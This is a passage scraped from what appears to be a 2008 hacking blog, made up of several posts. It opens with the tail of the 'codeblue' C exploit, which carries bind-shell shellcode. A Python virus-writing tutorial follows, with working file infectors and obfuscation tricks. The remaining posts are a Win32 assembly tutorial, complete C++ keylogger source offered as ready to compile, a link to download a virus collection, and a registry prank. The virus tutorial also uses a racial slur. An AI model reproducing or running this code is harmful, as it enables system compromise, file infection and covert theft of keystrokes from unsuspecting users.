* time last weekend, thankyou!!!) dedmunk, everyone at netcraft (esp Mike,
* hi!), everyone in sydney, dedmunk, everyone i go drinking with, anyone who
* lives in london, marlinspike (yo!), the woman who sells me my cigarettes in
* the morning on the way into work, thomas greene, dedmunk, adam, durab.
*
* BIG SHOUT OUT TO TOLIMAN AND ZERO SUM, UNDERSTAND!!
*
* propz to dme#!@#!@
*
* dont forget:
*
* $Header: /usr/src/Projects/codeblue/codeblue.c,v 1.1 2001/08/02 20:40:01 root Exp root $
*
******************************************************************************************
* -[ G O D B L E S S A M E R I C A ]- *
******************************************************************************************
*
*/
/* this is almost as shoddy as mystical mikes code */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define OF 2048 /* this is bigger than needed */

/* Optimized the code, now it works better in bad situations */
/* i dont know who wrote this, sorry, if you wrote it, let me know */

char lunix_shellcode[]=
“\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8″
“\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89″
“\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0″
“\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd”
“\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9″
“\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75″
“\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08″
“\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh”;

/*
shell on port 6969/tcp shellcode for OpenBSD by noir
*/

long bsd_shellcode[]=
{
0x4151c931,0×51514151,0x61b0c031,0x078980cd,
0x4f88c931,0x0547c604,0x084f8902,0x0647c766,
0x106a391b,0x5004478d,0x5050078b,0x68b0c031,
0x016a80cd,0x5050078b,0x6ab0c031,0xc93180cd,
0x078b5151,0xc0315050,0x80cd1eb0,0xc9310789,
0x50078b51,0xb0c03150,0x4180cd5a,0x7503f983,
0x5b23ebef,0xc9311f89,0x89074b88,0x8d51044f,
0x078b5007,0xc0315050,0x80cd3bb0,0x5151c931,
0x01b0c031,0xd8e880cd,0x2fffffff,0x2f6e6962,
0×90416873
};

int main(int argc, char *argv[])
{
struct sockaddr_in sock_in;
struct sockaddr_in sock_out;
char *port = “25″;
int fd, a;
int len;
int opt;
char bigbuf[OF];
char *p;
long lunix_resp = 0xbfffe0ac;
long bsd_resp = 0xdfbfc068;
char *moo = “220 “;

long resp = lunix_resp;
char *shellcode = lunix_shellcode;

printf(“strlen scode = %d\n”, strlen(shellcode));
if (argc == 2)
port = argv[1];

if (argc > 2) {
fprintf(stderr, “usege: %s [port]\n”, argv[0]);
exit(1);
}

resp += 8;

p = bigbuf;
memcpy(p, moo, 4);
p += 4;
memset(p, ‘\x90′, 1020 – strlen(shellcode));
p += 1020 – strlen(shellcode);
memcpy(p, shellcode, strlen(shellcode));
p += strlen(shellcode);
memcpy(p, &resp, 4);
p += 4;
memcpy(p, &resp, 4);
p += 4;
memset(p, ‘\n’, 4);

if ((fd = socket(PF_INET, SOCK_STREAM, 0)) < 0){
perror(“socket”);
exit(1);
}

memset(&sock_in, 0, sizeof(sock_in));
sock_in.sin_family = AF_INET;
sock_in.sin_port = htons(atoi(port));
sock_in.sin_addr.s_addr = INADDR_ANY;
len = sizeof(sock_in);

opt = 1;
if (setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(int)) == -1) {
perror(“setsockopt”);
exit(1);
}

if (bind(fd, (struct sockaddr *)&sock_in, len) < 0) {
perror(“bind”);
exit(1);
}

if (listen(fd, 5) < 0) {
perror(“listen”);
exit(1);
}

printf(“listening on port %d\n”, atoi(port));

for (;;) {
len = sizeof(sock_out);
if ((a = accept(fd, (struct sockaddr *)&sock_out, &len)) < 0){
perror(“accept”);
exit(1);
}
printf(“got a connection from %s\n”, inet_ntoa(sock_out.sin_addr));
fflush(stdout);

write(a, bigbuf, sizeof(bigbuf));
close(a);
}

return(1);

}

Python Virus Writing Tutorial

Posted on October 10, 2008 by admin | No Comments 

Python Virus Writing Tutorial
By VortX 2005

-Python?
-Python Appender
-Python Prepender Virus
-Virus As ASCII Numbers
-Using Variables To Encrypt
-Adding Trash
-snizzle p00p niggar

I warn you: This is the first tutorial i have ever written, 
so i guess it will be a bit shit!

Python?

Python is a freeware powerful interpreted programming language available for most operating systems.
It is object-oriented, interactive, portable and easy to learn. It is also popular as a CGI scripting
language, as its capabilities compare favorably with those of Perl (Not that i code perl)
It can be interpreted in a number of operating systems, this makes very good idea for future viruses
So erm, lets go!

Python Appender Virus:

Here i will show you a small appender. Appenders are a type of standard file infection along
with prepender and the lame overwriters (that no one really likes!) Damnit :p
Appending means to write the virus code after the normal code, therefore, the virus is run
after the hostcode.

<><><><><><><><><><><><><><><><><><><><><><><><><><>
Code:
Code:
import glob #!
from string import * #!
Files = glob.glob("*.py") + glob.glob("*.pyw") #!
for Files in Files: #!
   vCode = open(__file__, 'r') #!
   victim = open (Files, 'r') #!
   readvictim = victim.read() #!
   if find(readvictim, "-=::Vort3x::=-") == -1: #!
       victim = open(Files, 'a') #!
       for code in vCode.readlines(): #!
            if ("#!") in code: #!
                vCode.close() #!
                mycode=(chr(10)+code) #!
                victim.write(mycode) #!

<><><><><><><><><><><><><><><><><><><><><><><><><><><>
Here is how it works:

1: Searched for files (py / pyw) in current directory
2: Looks inside those files to find the infection marker. Note: this virus has 2 markers, ill explain later
3: Finds its own code
4: Opens the uninfected files and writes its code to the end of the normal code.
5: Closes all open files.. finished!

Why it has 2 markers: Well, the ones you notice the most are the virus code markers, we use these to
know what code to infect other files with. The virus will only copy the code that has "#!" at the end of
each line, understand? there are other ways of doing this but blah it works
Then we have the infection marker "-=::Vort3x::=-" this is so we can see if the file has already been infected.
If we dont use any infection marker, bad things will happen!!  Such as your virus re-appending to files. :O
Then you end up with HUGE files, growing in size each time its executed!

Python Prepender Virus

Prependers are again standard infection types. All this does is add its code to the top of the
infected file

<><><><><><><><><><><><>
<><><><><><><><><><><><><><>
Code:
Code:
import glob
from string import *
x = glob.glob("*.py") + glob.glob("*.pyw")
for x in x:
    host = open(x, 'r')
    hostcode = host.read()
    if find(hostcode, "-=::VortX::=-") == -1:
        host = open(x, 'w')
        myself = open(__file__, 'r')
        a = myself.read()
        num=50*2+5
        a = a[:find(a, "#VORTX")+num]
        mybody=a+chr(10)+hostcode
        myself.close()
        host.write(mybody)
#VORTX

<><><><><><><><><><><
><><><><><><><><><><><><><><><>
So:
-We seach for files
-Open the files and read its contents
-Store the code in a variable
-Open Myself (yahahaha Confused )
-Read my body and store in a variable
-Open the file(s) that havnt been infected (for writing) they are the files that dont have "-=::VortX::=-" inside!
-Cound number of characters long the virus code it upto the virus marker "#VORTX"
-Store everything into a new variable, write the virus code to the file and append the normal code
 to the end of the virus code.

Hmm hope that makes sense? its really easy.. think about it, play with the code

Virus As ASCII Numbers:

This method is easy and common in scripting languages. We change the code to its ASCII numbers.
Erm apart from spending hours encrypting it.. its easy  Thats why its a good idea to make your own
encryption tool  Made mine in VB, it saved time!!!! Very Happy but i think there is something like
that on VX Heaven, if you cant make your own? but you will need to play with the code a bit to make
it work in python.

<><><><><><><><>
<><><><><><><><><><><><><><><><><><>Code:

Code:
eval(chr(114)+chr(97)+chr(119)+chr(95)+chr(105)+chr(110)+chr(112)+chr(117)+chr(116)+chr(40)+chr(34)+chr(73)+chr(109)
+chr(32)+chr(86)+chr(111)+chr(114)+chr(116)+chr(88)+chr(44)+chr(32)+chr(87)+chr(101)+chr(108)+chr(99)+chr(111)+chr(109)+chr(101)+chr(32)+chr(116)+chr(111)+chr(32)+chr(109)+chr(121)+chr(32)+chr(119)+chr(111)+chr(114)+chr(108)+chr(100)+chr(33)+chr(34)+chr(41))

<><><><><><><><><
><><><><><><><><><><><><><><><><><>
This code has the "Raw_input" command (used for asking user input) 
but "print" neva seems to
work :/ Anywayz, its impossible to read this or know what it is unless you decrypt it all.
the code uses a command called "eval" eval is a function which evaluates a string as though it
were an expression and returns a result, we use it to run commands... this is used alot in encryption!

Using Variables To Encrypt:

Setting your own variable for each character (set of characters)

<><><><><><><><><>
<><><><><><><><><>
<><><><><><><><>
Code:
Code:
aa="pu"
bb="aw"
cc="t("
dd="r"
ee="_in"
ff="he"
hq="erz"
js=chr(34)
gg="ll"
yu="VX"
hh="o"+chr(32)
eval(dd+bb+ee+aa+cc+js+ff+gg+hh+yu+hq+js+')')

<><><><><><><><><
><><><><><><><><><
><><><><><><><><>
Nothing much to say about that, its another encryption.

Adding Trash:

It adds random trash code in each line at a random lengh. Hmm i hate to say it but
this code is pretty lame! it does not add its code in random area's
But i think it gives a good idea of poly in python!

<><><><><><><><><
><><><><><><><><><
><><><><><><><><>
Code:
Code:
import glob #!
import random #!
from string import * #!
trash = 'abcdefghijklmnopqrstuvwxyz' #!
lengh = random.randrange(10, 20) #!
Files = glob.glob("*.py") + glob.glob("*.pyw") #!
for Files in Files: #!
  vCode = open(__file__, 'r') #!
  victim = open (Files, 'r') #!
  readvictim = victim.read() #!
  if find(readvictim, "-=::Vort3x::=-") == -1: #!
      victim = open(Files, 'a') #!
      for code in vCode.readlines(): #!
           if ("#!") in code: #!
               vCode.close() #!
               mycode=(chr(10)+code) #!
               victim.write("#"+join(random.sample(trash, lengh))+mycode) #!

<><><><><><><><><>
<><><><><><><><><><><><><><><><><>
Yokay, ill explain

First we import the "Random module"
Then we set some random characters / numbers, into the "Trash" variable
Then we set the lengh of the random trash (the lengh is also random for 10 - 20)
Then we write our virus code to the host.
Then we put a comment marker for the trash (bcoz trash is not supposed to be executed!)
 we space each line in the infected file and add random characters
a random lengh from the trash variable into that line, please understand! its not hard

Its very very easy i think! It helps if you learn a little python first befor you start
 bitching about not understanding the code  because im not
about to answer emails asking me what each and every line does! im busy with trying to 
get into a college :/

snizzle p00p niggar:

Hmmm i have been typing this out for almost 2 hours, so, i dont really want to say much more
But, i think Python is a cool language, there is a lot to be done yet. I'd like to see more 
python viruses lazy arse bastards! I should have done more,
 but only today i started learning python again after almost 3 months! :p
Please tell me about any bugs in my code (yea yea!)

Big huge YOUR THE BEST to SPTH my idol!  thx for all the help!!!!!!.. and yes.. im annoying!
HoneyHeart........... for being a good friend
LL............. She;s cool  lolz, i still want ur number
Sinclair........... for allowing me in DCA chan, not that i often go there :/
Blueowl............ For helping me for some time.
hurm1t............ he;s got everything.. worship him  thnx for your sources.. nice!
Nova.......... Lush graphics for my desktop  thank me for all the girls you bastard >
Blueprint............. for hosting my little scripts
Blank.................. for hosting this tutorial *havnt asked yet* but he WILL *Gets the knife* he will!!!!
dr3f.................... Fucking cock sucker!!!!!
AngelArt............. for being a friend  awwww  we are all waitng for your script! Female programmers exist!
Muazzin.............. where the fuck are you? wanted to talk to me, next day ur GONE! :/
Thugstyle................ haha Very Happy
Shree............... did you ENJOY sending porn from MY account!!! wrong time of the month?

And others.. that im afraid to list :X like bliss but he sux so who cares :p

Contact:
STFU

Writing Win32 programs in assembly language using TASM

Posted on October 10, 2008 by admin | 1 Comment 

written by Malfunction
  +--------------------+

 Foreword:
 =========

 This tutorial is for the beginner who can already code in assembly
 language and who has already coded real mode DOS programs.
 So it's for someone like me a half year ago. :)
 At that time I was searching for some documentation on Win32 assembly.
 As I searched for this I mostly found assembler tutorials for
 real mode programs. And I found lots of links pointing to Iczelion's
 Win32 assembler tutorial, which is written for MASM and uses
 lots of macro shit. The only Win32 ASM tutorial for TASM I have seen
 so far was written by ... let me think ... I believe he called himself
 Masta ... yes, Masta's Win95 ASM tutorial. That wasn't bad, but it
 didn't explain all the stuff I wanted to know. So I decided to
 write my own little tutorial on the subject. I wrote this with the
 aim to write a very complete tutorial. I hope you'll like it! ;) 

 Coding in Win32 environment
 ===========================

 As you may know Windows runs in protected mode and so our code will
 do so as well. Windows provides a virtual address space of
 theoretically 4GB of memory for every process. The use of this virtual memory
 allows the system to use the hard disk for swapping when the physical
 memory ain't enough. When you code, you code in a so called "flat"
 memory model. This means you don't need to care for the segment registers
 anymore and that makes the ASM coding a hell easier. You only need
 DWORD offsets when you address memory in Win32. In contrast to 16-bit
 systems like DOS and Win 3.1, 32-bit systems use DWORDs as offsets.
 Do not modify the segment registers or your program will fuck up
 with a chance of 99,99%.
 You will use the 32-bit registers much more than before (if you haven't used
 them already before). Let's take the LOOP instruction for example:
 Now the whole ECX will decrement and not only CX. Remember that!
 In protected mode (as the name suggests) the memory can be protected.
 So you may have read/write access, read only access or no access at all.
 Maybe you have coded COM files in the past and you always had all
 your code and your data in one segment. If you try the same here
 it won't work because:
 1) there MUST be something in the data section or the linker will fail
 2) the code section is write protected, so don't put any variables in here
 Many people tried to use interrupts in Win32 inline ASM code. But this
 doesn't work because you don't call REAL MODE interrupts. You would call
 the protected mode INTs and the good old DOS INTs aren't available anymore.
 Instead of INTs you need to use the Windows API. For a complete documentation
 take a look at Microsoft's MSDN (http://msdn.microsoft.com).
 It is a similar case with the I/O ports. Because your program will
 run in priviledge mode 3 (also called RING-3) you won't be able to access
 some ports. Win95/98/ME don't protect all the I/O ports, but WinNT/2K/XP
 do. In your DOS programs you might still be able to use some ports
 because WinNT/2K/XP allow to use them in the Virtual x86 mode for
 compatiblity reasons.
 And at last I wanna remind you that you will code CASE SENSITIVE from
 now on! It's just like in C++. :)
 This is really important and so write MessageBoxA please and not mESSAGEboXa
 for example! ;) 

 Hello World! in Win32 ASM
 =========================

 Enough theoretical stuff, let's see some code!

 ; ------ CUT here ----------------------------------------------

.386
.model flat

        extrn ExitProcess:proc
        extrn MessageBoxA:proc

.data

        msg_title   DB "MessageBox title",0
        msg_message DB "Hello World!",0

.code

start:
        push 0
        push offset msg_title
        push offset msg_message
        push 0
        call MessageBoxA

        push 0
        call ExitProcess

end start

 ; ------ CUT here ----------------------------------------------

 And now the explanations. :) 

 - .386
 - .model flat

 I think this is obvious. The processor directive MUST be before the
 memory model and it must be at least a 386. The model directive
 says we use a flat memory model.

 - extrn ExitProcess:proc
 - extrn MessageBoxA:proc

 Here we import 2 APIs from Kernel32.dll. Do not forget the :proc after
 the API names! The linker will give you no error, but your program
 will definitively fuck up!

 - msg_title DB "MessageBox title",0

 Note that almost every string in Windows is zero terminated.

 - push 0
 - push offset msg_title
 - push offset msg_message
 - push 0
 - call MessageBoxA

 At this time we call an API, the MessageBoxA API to be exactly.
 See below for more info.

 - push 0
 - call ExitProcess

 Yes, no INTs anymore. We use the ExitProcess API to quit. In this
 code example I used 0 as exit code.

 Something more about APIs
 =========================

 The MessageBoxA call might look a little strange to you.
 Let's see what the MSDN tells us about this API:

 int MessageBox(HWND  hwndOwner,       // handle of owner window
                LPCTSTR  lpszText,     // address of text in message box
                LPCTSTR  lpszTitle,    // address of title of message box
                UINT  fuStyle          // style of message box
                );

 In Win32, parameters aren't passed in registers anymore. Instead they are
 pushed on the stack. You really can assume that every parameter
 is DWORD size. If you code 'push 0' this instruction will push a
 DWORD 0 on the stack, not a WORD.
 If you take a closer look you will notice that the parameters are
 pushed on the stack in the wrong order. As far as I know is this pascal
 calling convention. So you have to push the last parameter as the first
 one and the first parameter as the last one.
 Then simply call the API. The return value will always be in EAX.

 If you have already coded Win32 in C++, you may have wondered about
 that A behind the MessageBox API: "In my C++ code I never typed this ...".
 Lot's of APIs that use strings are available in two versions:
 ANSI and UNICODE. The ones with the A are ANSI and the ones with
 a W at the end are UNICODE (W = Wide chars).

 Do not forget to save register values which you need before you call an API.
 In good old DOS times you knew exactly which registers will be destroyed
 by an INT call, but in the case of APIs you never know. So this is
 especially important in loops because ECX can be anything after the API call.
 You can only be sure that EBP won't be changed by an API call.
 The reason why EBP won't ever be changed by any API is simple:
 most programs use EBP to build the stack frame.

 One more code example
 =====================

 Let's have another simple code example. This little program will show
 the system time in a message box. Here we go:

 ; ------ CUT here ----------------------------------------------

.386
.model flat

        extrn ExitProcess:proc
        extrn MessageBoxA:proc
        extrn GetSystemTime:proc

.data

        _SYSTEMTIME struc
                wYear DW ?
                wMonth DW ?
                wDayOfWeek DW ?
                wDay DW ?
                wHour DW ?
                wMinute DW ?
                wSecond DW ?
                wMilliseconds DW ?
        _SYSTEMTIME ends

        SYSTEMTIME _SYSTEMTIME

        myTitle DB "tell me what time it is ...",0
        myMessage DB "The system time is: "
        time_string DB "00:00 h",0

.code

start:
        push offset SYSTEMTIME
        call GetSystemTime

        lea edi,[time_string+4]
        xor eax,eax
        mov ax,[SYSTEMTIME.wMinute]
        call convert_to_string

        lea edi,[time_string+1]
        xor eax,eax
        mov ax,[SYSTEMTIME.wHour]
        call convert_to_string

        push 0
        push offset myTitle
        push offset myMessage
        push 0
        call MessageBoxA

        push 0
        call ExitProcess

convert_to_string:
        xor edx,edx
        mov ecx,10
        div ecx
        or dl,30h
        mov byte ptr [edi],dl
        xor edx,edx
        div ecx
        or dl,30h
        dec edi
        mov byte ptr [edi],dl
        ret

end start

 ; ------ CUT here ----------------------------------------------

 How to compile and link a Win32 program?
 ========================================

 For our 'hello world' program (hello.asm) we would compile it as the following:

 tasm32 /ml hello.asm
 tlink32 /Tpe /aa /c hello.obj,,,import32.lib

 As you can see you need to use tasm32.exe and tlink32.exe and not the
 DOS verions (it's the same for td32.exe). Let's discuss the parameters
 briefly:

 /ml - compile case sensitive
 /Tpe - set's output to PE (Portable EXE), /Tpd would be DLL
 /aa - uses Windows API
 /c - case sensitive linking
 import32.lib - see below ...

 How to use APIs from other DLLs?
 ================================

 Normally, you specify only the import32.lib file for the linker. This
 is the standard file and it's used by the linker for our API references.
 Import32.lib contains all APIs from kernel32.dll, user32.dll and gdi32.dll
 (maybe more, but at least these ones). Let's imagine we want to use the
 registry in our program. For that purpose we need some APIs like
 RegOpenKeyExA. These registry APIs are in advapi32.dll. In your program
 code you declare them as normal APIs, but how to tell the linker that
 we wanna use it? At first, we need to make our own '.lib' file. For that
 purpose we take the implib.exe from TASM's BIN directory:

 Implib -c advapi32.lib C:\windows\system\advapi32.dll

 Do not forget the -c for case sensitive. Now we need to copy the '.lib'
 file to TASM's LIB directory. And now we can give the linker this
 additional '.lib' file:

 tlink32 /Tpe /aa /c program.obj,,,import32.lib advapi32.lib

 stdcall - does is make the nasty coding easier?
 ===============================================

 Lot's of Win32 ASM sources use a model directive like the following:

 .model flat, stdcall

 Hmm ... what does stdcall mean? Most coders don't seem to know that.
 They type it because they have seen it somewhere and there's no
 problem using it. I may be wrong here, but it seems to me that this
 is only something that shall make parameter pushing easier.
 All the documentation on the APIs is written for C++ and it is really
 nasty to begin with the last parameter. Let's take the call to the
 MessageBoxA API from the 'hello world' program above. Using the stdcall
 we could write it like this:

 call MessageBoxA, 0, offset msg_message, offset msg_title, 0

 Yes, all in one line. The compiler will produce the push instructions
 for us. The special thing here is that the parameters are given in the
 correct order. In my opinion, this makes the code less readable and
 makes some little optimizations impossible. If you want to call an API
 that needs lots of parameters the line with the call could be very long.
 To continue the call in the next line you can use a '\' at the end of
 a line. Example:

 call CreateProcessA, 0, offset commandline, 0, 0, 0, 0, 0, 0,\
                      offset startupinfo, offset processinformation

 Writing your own DLL
 ====================

 Let's imagine you want to write your own DLL and you want to export
 some of it's functions. Just write it like a normal program. The
 exported function should be written like this:

 public myFunction

 myFunction PROC
     ; your code goes here ...
     ret
 myFunction ENDP

 If you don't declare your function as public the linker will give you
 a warning. The initialization stuff at the entry point of your program
 must quit with a 'ret 0Ch' and NOT with ExitProcess! The reason is simple:
 The loader calls the entry point like this:

 BOOL WINAPI DllEntryPoint(
                HINSTANCE  hinstDLL,        // handle of DLL module
                DWORD  fdwReason,           // reason for calling function
                LPVOID  lpvReserved         // reserved
               );

 In your DllEntryPoint you can do some initialization stuff. This
 entrypoint is called several times. It is called when the DLL is
 being attached to process or thread or when it's being detached
 from a process or thread. Check the MSDN for the different
 values of the fdwReason parameter. Some of the registers must
 be preserved in your DLL entrypoint. This is very important because
 if you don't preserve them the process which loaded the DLL
 will be terminated without any error message after the DLL
 entrypoint was run. I don't know exactly which registers must
 be preserved, but ESI for sure. It's a good idea to preserve simply
 all register by using PUSHAD and POPAD. The return value
 is only of importance when the entrypoint is called with the
 DLL_PROCESS_ATTACH value for the fwdReason. It must be nonzero
 (true) to signalize the LoadLibrary API that the initialization
 was successful. If you return zero the DLL will be removed
 from the process. Construct your entrypoint like this:

dllmain:
        pushad
        ; ...
        ; code
        ; ...
        popad
        mov eax,1
        ret 0Ch

 To export your function you need to write a '.def' file.
 These definition files seem to be very similar to the C++ ones. I don't
 know much about them, but I know that you can write the following
 to export your function:

 EXPORTS
     myFunction

 That's all. To link the file you need to specify the '.def' file
 and you must use /Tpd instead of /Tpe.

 Using resources
 ===============

 The standard application icon looks boring ...
 Let's give your program another icon! All we need is an icon (of course *g*)
 and a '.rc' file. Again, these resource scripts are very similar (maybe
 even equal) to the C++ ones. Again, I don't know much about '.rc' files,
 I only used icons so far. :(
 The contents of your resource script should look like:

 100 ICON "C:\path\filename.ico"

 Having this resource files you need to compile it to a *.res file.
 Use the brcc32.exe to do this:

 brcc32.exe myfile.rc

 Then you only need to give the filename of your *.res file as
 a parameter to the linker. Simply start tlink32 /? to see how
 to do this.
 (I'm too lazy to type this and it's now 04:05 o'clock here *g*).

 Last words
 ==========

 I really hope you liked this tutorial. It really took me some time to write
 all this stuff and two beer, one cigarette, one potion of Snus (swedish tobacco)
 and noisy music were needed to help me writing. :) )
 Please mail if you think this tutorial is great, if you think this
 tutorial suckz (but then tell me WHY) or if you have a question
 about Win32 assembly (but do not expect that I can answer it, hehe).
 I'm happy about every mail I receive and I promise to answer.

 mal.function@gmx.net

(c) 2001 Malfunction

Keylogger in C++

Posted on October 10, 2008 by admin | No Comments

the keylogger.cpp file

#include < stdio.h >
#include < windows.h >
#include “keylogger.h”
bool logging=false;
DWORD TID=0;
HMODULE hMod=0;
HANDLE myFile=0;
HANDLE hThread=0;
HHOOK lHook=0;
HWND prevF=0;
LRESULT __stdcall manticoreProc(int code,WPARAM wParam,LPARAM lParam)
{
    if(code<0)
    {
        return CallNextHookEx(lHook,code,wParam,lParam);
    }
    if(code==HC_ACTION)
    {
        EVENTMSG *pEvt=(EVENTMSG *)lParam;
        if(pEvt->message==WM_KEYDOWN)
        {
            DWORD dwCount,dwBytes;
            char svBuffer[256];
            int vKey,nScan;
            vKey=LOBYTE(pEvt->paramL);
            nScan=HIBYTE(pEvt->paramL);
            nScan<<=16;
            HWND hFocus=GetActiveWindow();
            if(prevF!=hFocus)
            {
                char svTitle[256];
                int nCount;
                nCount=GetWindowText(hFocus,svTitle,256);
                if(nCount>0)
                {
                    char svBuffer[512];
                    wsprintf(svBuffer,”\r\n—–[ %s ]—–\r\n”,svTitle);
                    WriteFile(myFile,svBuffer,lstrlen(svBuffer),&dwBytes,NULL);
                }
                prevF=hFocus;
            }
            dwCount=GetKeyNameText(nScan,svBuffer,256);
            if(dwCount)
            {
                if(vKey==VK_SPACE)
                {
                    svBuffer[0]=’ ‘;
                    svBuffer[1]=”;
                    dwCount=1;
                }
                if(dwCount==1)
                {
                    BYTE kbuf[256];
                    WORD ch;
                    int chcount;
                    GetKeyboardState(kbuf);
                    chcount=ToAscii(vKey,nScan,kbuf,&ch,0);
                    if((chcount>0)&&(ch>=32)&&(ch<=127))
                    {
                        WriteFile(myFile,&ch,chcount,&dwBytes,NULL);
                    }
                }
                else
                {
                    WriteFile(myFile,”[",1,&dwBytes,NULL);
                    WriteFile(myFile,svBuffer,dwCount,&dwBytes,NULL);
                    WriteFile(myFile,"]“,1,&dwBytes,NULL);
                    if(vKey==VK_RETURN)
                    {
                        WriteFile(myFile,”\r\n”,2,&dwBytes,NULL);
                    }
                }
            }
        }
    }
    DWORD fsize=GetFileSize(myFile,0);
    if(fsize>=5242880)
    {
        SetFilePointer(myFile,0,0,FILE_BEGIN);
        SetEndOfFile(myFile);
    }
    return CallNextHookEx(lHook,code,wParam,lParam);
}
DWORD __stdcall manticoreThread(LPVOID lpv)
{
    MSG msg;
    BYTE keytbl[256];
    for(int i=0;i<256;++i)
    {
        keytbl[i]=0;
    }
    logging=true;
    prevF=0;
    myFile=CreateFile((char *)lpv,GENERIC_WRITE,FILE_SHARE_READ,0,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,0);
    if(myFile==INVALID_HANDLE_VALUE)
    {
        return 1;
    }
    if(SetFilePointer(myFile,0,0,FILE_END)==0xffffffff)
    {
        CloseHandle(myFile);
        myFile=0;
        return 1;
    }
    lHook=SetWindowsHookEx(WH_JOURNALRECORD,manticoreProc,hMod,0);
    if(lHook==0)
    {
        CloseHandle(myFile);
        myFile=0;
        return 1;
    }
    logging=true;
    while(logging)
    {
        while(PeekMessage(&msg,0,0,0,PM_NOREMOVE))
        {
            GetMessage(&msg,0,0,0);
            if(msg.message==WM_CANCELJOURNAL)
            {
                SetKeyboardState(keytbl);
                lHook=SetWindowsHookEx(WH_JOURNALRECORD,manticoreProc,hMod,0);
                if(lHook==0)
                {
                    CloseHandle(myFile);
                    myFile=0;
                    return 1;
                }
            }
            else
            {
                DispatchMessage(&msg);
            }
        }
        Sleep(1);
    }
    UnhookWindowsHookEx(lHook);
    CloseHandle(myFile);
    myFile=0;
    hThread=0;
    return 0;
}
bool manticoreLog(const char *file)
{
    if(logging==true)
    {
        return false;
    }
    hThread=CreateThread(0,0,manticoreThread,(LPVOID)file,0,&TID);
    if(hThread==0)
    {
        return false;
    }
    return true;
}
bool manticoreStop()
{
    if(logging==false)
    {
        return false;
    }
    if(WaitForSingleObject(hThread,2000)==WAIT_OBJECT_0)
    {
        return false;
    }
    logging=false;
    return true;
}

the keylogger.h header file

#ifndef KEYLOGGER_H
#define KEYLOGGER_H
#include
extern HMODULE hMod;
LRESULT __stdcall manticoreProc(int,WPARAM,LPARAM);
DWORD __stdcall manticoreThread(LPVOID);
bool manticoreLog(const char *);
bool manticoreStop();
#endif

ready to b compiled :-)

6000 Viruses Malware Researcher Starter Kit

Posted on October 10, 2008 by admin | No Comments

Ultimate virus collection. a dangerous one.
This is only meant for education purpose. The user will be responsible for any damage if caused.
Use it carefully. All viruses are dangerous.

download link:

http://rapidshare.com/files/152561063/6000.Viruses.VX.Collector-Malware.Researcher.Starter.Kit.rar

A Cool Trick – SHOW YOUR PC PENTIUM 5 OR MORE

Posted on October 9, 2008 by admin | No Comments

By: Nitin

SHOW YOUR PC PENTIUM 5 OR MORE

GO TO START>RUN>TYPE REGEDIT>HKEY_LOCAL_MACHINE>HARDWARE>DISCRIPTION>SYSTEM>CENTRAL

PROCESSOR>ON RIGHT HAND SIDE RIGHT CLICK ON PROCESSOR NAME AND STRING AND THE CLICK ON

MODIFY AND WRITE WHAT EVER YOU WANT OR NAME IT PENTIUM 5 OR MORE

HEYY FRNDS DO REPLY IF U LIKE THIS TRICK